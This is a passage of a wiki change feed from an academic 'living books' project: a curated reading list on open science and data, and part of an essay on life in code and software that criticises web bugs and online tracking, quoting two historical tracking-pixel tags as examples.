;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5221</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=5221"/>
		<updated>2012-10-19T10:12:36Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4] &lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
&lt;br /&gt;
=== Life-Tracking  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=27381297}} &lt;br /&gt;
&lt;br /&gt;
;[http://quantifiedself.com Quantified Self]&lt;br /&gt;
&lt;br /&gt;
;Gary Wolf&amp;amp;nbsp; &lt;br /&gt;
:[http://xrl.us/bh3d4g The Data-Driven Life]&lt;br /&gt;
&lt;br /&gt;
;Aiden R. Doherty and Alan F. Smeaton&amp;amp;nbsp; &lt;br /&gt;
:[http://doras.dcu.ie/15300/1/Sensors-03-154-Doherty-ie-edited.pdf Automatically Augmenting Lifelog Events Using Pervasively Generated Content from Millions of People]&lt;br /&gt;
&lt;br /&gt;
;Jennifer S. Beaudin, Stephen S. Intille, and Margaret E. Morris&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC1794006/?tool=pmcentrez#ref1 To Track or Not to Track: User Reactions to Concepts in Longitudinal Health Monitoring]&lt;br /&gt;
&lt;br /&gt;
=== The Neurological Turn: or, ‘How the Internet Gets Inside Us'  ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;NhLnoZFCDBM&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Adam Gopnik&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newyorker.com/arts/critics/atlarge/2011/02/14/110214crat_atlarge_gopnik The Information: How the Internet Gets Inside Us]&lt;br /&gt;
&lt;br /&gt;
;N. Katherine Hayles&amp;amp;nbsp; &lt;br /&gt;
:[http://www.sciy.org/2010/11/24/hyper-and-deep-attention-the-generational-divide-in-cognitive-modes-by-n-katherine-hayles/ Hyper and Deep Attention: The Generation Divide in Cognitive Modes]&lt;br /&gt;
&lt;br /&gt;
;Anna Munster&amp;amp;nbsp; &lt;br /&gt;
:[http://computationalculture.net/article/nerves-of-data Nerves of Data: The Neuological Turn In/Against Networked Media]&lt;br /&gt;
&lt;br /&gt;
== '''Visualize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== What is Visualization?  ===&lt;br /&gt;
&lt;br /&gt;
;Lev Manovich&amp;amp;nbsp; &lt;br /&gt;
:[http://manovich.net/blog/wp-content/uploads/2010/10/manovich_visualization_2010.doc What is Visualization?]&lt;br /&gt;
&lt;br /&gt;
;Nathan Yau&amp;amp;nbsp; &lt;br /&gt;
:[http://flowingdata.com/2011/02/23/data-visualization-meets-game-design-to-explore-your-digital-life/ Data Visualization Meets Game Design to Explore your Digital Life]&lt;br /&gt;
&lt;br /&gt;
;[http://bloom.io/ Bloom]&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8569187}} &lt;br /&gt;
&lt;br /&gt;
;Keiichi Matsuda &lt;br /&gt;
:[http://www.keiichimatsuda.com/augmented.php Augmented (hyper)Reality: Domestic Robocop]&lt;br /&gt;
&lt;br /&gt;
=== Mood-mapping  ===&lt;br /&gt;
&lt;br /&gt;
;Celeste Biever&amp;amp;nbsp; &lt;br /&gt;
:[http://www.newscientist.com/article/dn19200-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter Mood Maps Reveal Emotional States of America]&lt;br /&gt;
&lt;br /&gt;
;[http://www.newscientist.com/articlevideo/dn19200/221111468001-twitter-mood-maps-reveal-emotional-states-of-america.html Twitter mood video]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ZglPWYb8X2o&amp;lt;/youtube&amp;gt; [http://www.moodscope.com/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.moodscope.com/ Moodscope]&lt;br /&gt;
&lt;br /&gt;
;[http://www.mappiness.org.uk Mappiness]&lt;br /&gt;
&lt;br /&gt;
=== The Visualized Human (or, The Human As Spectacle)  ===&lt;br /&gt;
&lt;br /&gt;
;Nicholas Felton&amp;amp;nbsp; &lt;br /&gt;
:[http://feltron.com/ The Annual Felton Report]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;RE4ce4mexrU&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Deb Roy&amp;amp;nbsp; &lt;br /&gt;
:[http://www.youtube.com/watch?v=RE4ce4mexrU&amp;amp;feature=youtu.be The Birth of a Word]&lt;br /&gt;
&lt;br /&gt;
;Johanna Drucker&amp;amp;nbsp; &lt;br /&gt;
:[http://mit.tv/y7OwFq Humanistic Approaches to the Graphical Expression of Interpretation]&lt;br /&gt;
&lt;br /&gt;
== Search Me  ==&lt;br /&gt;
&lt;br /&gt;
=== Search-Engine Science  ===&lt;br /&gt;
&lt;br /&gt;
;Emily H. Chan, Vikram Sahai, Corrie Conrad, and John S. Brownstein&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC3104029&amp;amp;tool=pmcentrez Using Web Search Query Data to Monitor Dengue Epidemics: A New Model for Neglected Tropical Disease Surveillance]&lt;br /&gt;
&lt;br /&gt;
;Annie Y.S. Lau, Enrico Coiera, Tatjana Zrimec, and Paul Compton&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/articlerender.cgi?accid=PMC2956236&amp;amp;tool=pmcentrez Clinician Search Behaviors May Be Influenced by Search Engine Design]&lt;br /&gt;
&lt;br /&gt;
:[https://brandyourself.com/ BrandYourself]&lt;br /&gt;
&lt;br /&gt;
=== The Science of Control  ===&lt;br /&gt;
&lt;br /&gt;
;Alession Signorini, Alberto Maria Segre, Philip M. Polgreen&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0019467 The Use of Twitter to Track Levels of Disease Activity and Public Concern in the U.S. During the Influenza A H1N1 Pandemic]&lt;br /&gt;
&lt;br /&gt;
;David Parry&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/Surveillance ''Surveillance'' ]&lt;br /&gt;
&lt;br /&gt;
;Felix Stalder and Christine Mayer&amp;amp;nbsp; &lt;br /&gt;
:[http://felix.openflows.com/node/113 The Second Index: Search Engines, Personalization and Surveillance (Deep Search)]&lt;br /&gt;
&lt;br /&gt;
=== Deep Search  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=13456992}} &lt;br /&gt;
&lt;br /&gt;
;Michael K. Bergman&amp;amp;nbsp; &lt;br /&gt;
:[http://quod.lib.umich.edu/cgi/t/text/text-idx?c=jep;view=text;rgn=main;idno=3336451.0007.104 The Deep Web: Surfacing Hidden Value]&lt;br /&gt;
&lt;br /&gt;
;Clare Birchall&amp;amp;nbsp; &lt;br /&gt;
:[http://www.livingbooksaboutlife.org/books/The_in/visible The Invisible Web, ''The In/Visible'']&lt;br /&gt;
&lt;br /&gt;
== Media Gifts?  ==&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=8223187}} [http://www.suicidemachine.org/] &lt;br /&gt;
&lt;br /&gt;
;[http://www.suicidemachine.org/ Web 2.0 Suicide Machine]&lt;br /&gt;
&lt;br /&gt;
;[http://transparencygrenade.com/ Transparency Grenade]&lt;br /&gt;
&lt;br /&gt;
;[http://www.freedomboxfoundation.org/ Freedom Box Foundation]&lt;br /&gt;
&lt;br /&gt;
;[http://yacy.net/en/index.html/ YaCy]&lt;br /&gt;
&lt;br /&gt;
;[http://navasse.net/traceblog/about.html Traceblog]&lt;br /&gt;
&lt;br /&gt;
;[http://turbulence.org/Works/JJPS/extension The JJPS Firefox Extension]&lt;br /&gt;
&lt;br /&gt;
;[http://www.weavrs.com/find/ Weavers]&lt;br /&gt;
&lt;br /&gt;
;[http://bengrosser.com/projects/facebook-demetricator/ Facebook Demetricator]&lt;br /&gt;
&lt;br /&gt;
== Appendix  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;ukNkx45Ua0Y&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
;Karl Popper, The Open Society and its Enemies&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Attributions Attributions]  ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book  ==&lt;br /&gt;
&lt;br /&gt;
;[http://livingbooksaboutlife.org/pdfs/bookarchive/DigitizeMe.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4997</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4997"/>
		<updated>2012-06-21T11:25:30Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, while having concrete effects nonetheless. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep - although it is useful to note that some theorists, such as Frabetti (2010), have problematised Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in 